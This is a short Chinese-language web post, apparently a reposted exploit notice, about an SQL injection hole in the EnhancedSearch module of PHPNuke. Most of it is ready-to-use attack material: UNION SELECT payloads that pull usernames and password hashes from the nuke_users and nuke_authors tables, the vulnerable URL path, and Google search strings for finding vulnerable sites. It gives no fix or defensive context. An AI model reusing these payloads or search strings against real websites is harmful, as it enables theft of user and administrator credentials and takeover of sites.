PHPNuke所有版本EnhancedSearch文件存在注入漏洞

来源:互联网 发布:.fm域名 编辑:程序博客网 时间:2024/05/17 02:14
SQL Injection :

EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*

EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

-------------------------------------------

http://www.victim.com/path/modules.php?name=EnhancedSearch

Search :

EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

-------------------------------------------

google:

"Enhanced Search Version 2.0: Powered by"

inurl:"modules.php?name=EnhancedSearch"
 
原创粉丝点击